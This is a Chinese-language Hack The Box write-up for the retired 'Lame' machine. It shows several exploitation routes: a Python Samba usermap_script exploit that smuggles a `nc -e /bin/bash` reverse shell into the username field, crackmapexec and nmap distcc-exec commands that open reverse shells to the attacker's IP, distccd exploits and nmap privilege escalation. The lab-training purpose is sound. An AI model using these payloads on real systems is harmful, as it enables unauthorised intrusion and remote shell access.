HTB-靶机-Lame

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.3

sudo nmap -n -p- -sC -sV -T5 -oN lame.nmap 10.10.10.3

nmap扫描结果

根据扫描结果，试了下vsftp的后门利用代码，对于exploit https://www.exploit-db.com/exploits/17491 确认不可利用，所以此靶机靶机很简单直接直接使用smb对应的exp即可

姿势一：MSF

拿到权限获取root.txt信息即可

对应payload 代码：https://www.exploit-db.com/exploits/16320 

姿势二：python脚本exploit

#!/usr/bin/python

from smb.SMBConnection import SMBConnection
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys
if len(sys.argv) < 2:
    print ("\nUsage: " + sys.argv[0] + " <HOST>\n")
    sys.exit()



username = "/=`nc -e /bin/bash 10.10.14.4 8833`"
password = ""
conn = SMBConnection(username, password, "HACKTHEBOX" , "HTB", use_ntlm_v2 = False)
assert conn.connect(sys.argv[1], 445)

=======================================
python3

另一款类似的python利用代码
https://github.com/amriunix/CVE-2007-2447/blob/master/usermap_script.py

姿势三：利用distccd 反弹shell

通过在msf中搜索 distccd 即可找到对应的exp，然后利用，拿到shell之后通过提权脚本检查目标靶机的所有权限，得知nmap可以直接使用交互式模式直接提权 ，提权检查脚本 https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py

姿势四：通过python脚本利用distccd

对应的python2版本的利用代码地址：https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/48ab4eb0bd69cac67bc97fbe182e39e5ded99f9f/distccd_rce_CVE-2004-2687.py

姿势五：直接手动利用samba 3.2漏洞

PS：这里有个小坑，在使用enum4linux ，smbclient等命令的时候如果是最新版，那么在枚举此靶机目标的时候会报错，无法枚举，经过排查确认是因为最新版已经移除了就的相关协议，所以我们需要加上即可，具体添加如下信息：

sudo vim /etc/samba/smb.conf
添加
[global]
client min protocol=NT1
或者
smbclient -N //10.10.10.3/tmp --option='client min protocol=NT1'

上述还可以使用神器cme 地址：https://github.com/byt3bl33d3r/CrackMapExec/releases

对应的各种可能的命令：

smb -x "./=`nohup nc -e /bin/sh 10.10.14.4 6644`" --exec-method smbexec 10.10.10.3
smb --shares 10.10.10.3 -u './=`nohup nc -e /bin/sh 10.10.14.17 6644`' -p ''

姿势六：使用nmap脚本拿shell

nmap -p3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='nc -e /bin/bash 10.10.14.4 4444'"

我测试没有成功，上述执行报错

总结：本靶机难度很低，不过思路方法很多，有手动，有自动，使用metasploit是最low的一种方式，所以还是建议使用手动知其然知其所以然才可用，这里可参考这博客还有其他两种姿势：

https://coldfusionx.github.io/posts/LameHTB/  
https://noobsec.net/hackthebox/htb-lame/ 
https://github.com/gwyomarch/Lame-HTB-Writeup-FR 
https://0xdf.gitlab.io/2020/04/07/htb-lame.html